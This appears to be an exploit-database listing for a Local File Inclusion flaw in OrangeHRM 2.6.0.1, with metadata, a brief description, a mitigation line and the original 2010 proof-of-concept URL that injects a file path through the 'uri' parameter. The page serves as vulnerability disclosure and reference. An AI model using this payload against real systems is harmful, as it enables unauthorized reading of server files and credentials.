header-logo
Suggest Exploit
vendor:
OrangeHRM
by:
ZonTa
8,8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: OrangeHRM
Affected Version From: 2.6.0.1
Affected Version To: 2.6.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:orangehrm:orangehrm:2.6.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache, PHP5
2010

OrangeHRM 2.6.0.1 Local File Inclusion Vulnerability

OrangeHRM 2.6.0.1 is vulnerable to a Local File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious file path in the 'uri' parameter. This will allow the attacker to read any file on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

# Exploit Title: 	OrangeHRM 2.6.0.1 Local File Inclusion Vulnerability
# Date: 11-10-2010
# Author: ZonTa -[ LkHackerZ ]-
# Mail: zontahackers[at]gmail[dot]com
# Software Link: 	http://www.orangehrm.com/product-download.php?type=stable-zip
					http://sourceforge.net/projects/orangehrm/files/stable/2.6/orangehrm-2.6.0.1.zip/download
# Version: 2.6.0.1 
# Tested on: Apache,PHP5
-------------------------------------------------------------------------------------------------------------------

POC

http://localhost/orangehrm/index.php?uniqcode=KPI&menu_no_top=performance&uri=[local-file]

---------------------------------------------------- END ----------------------------------------------------------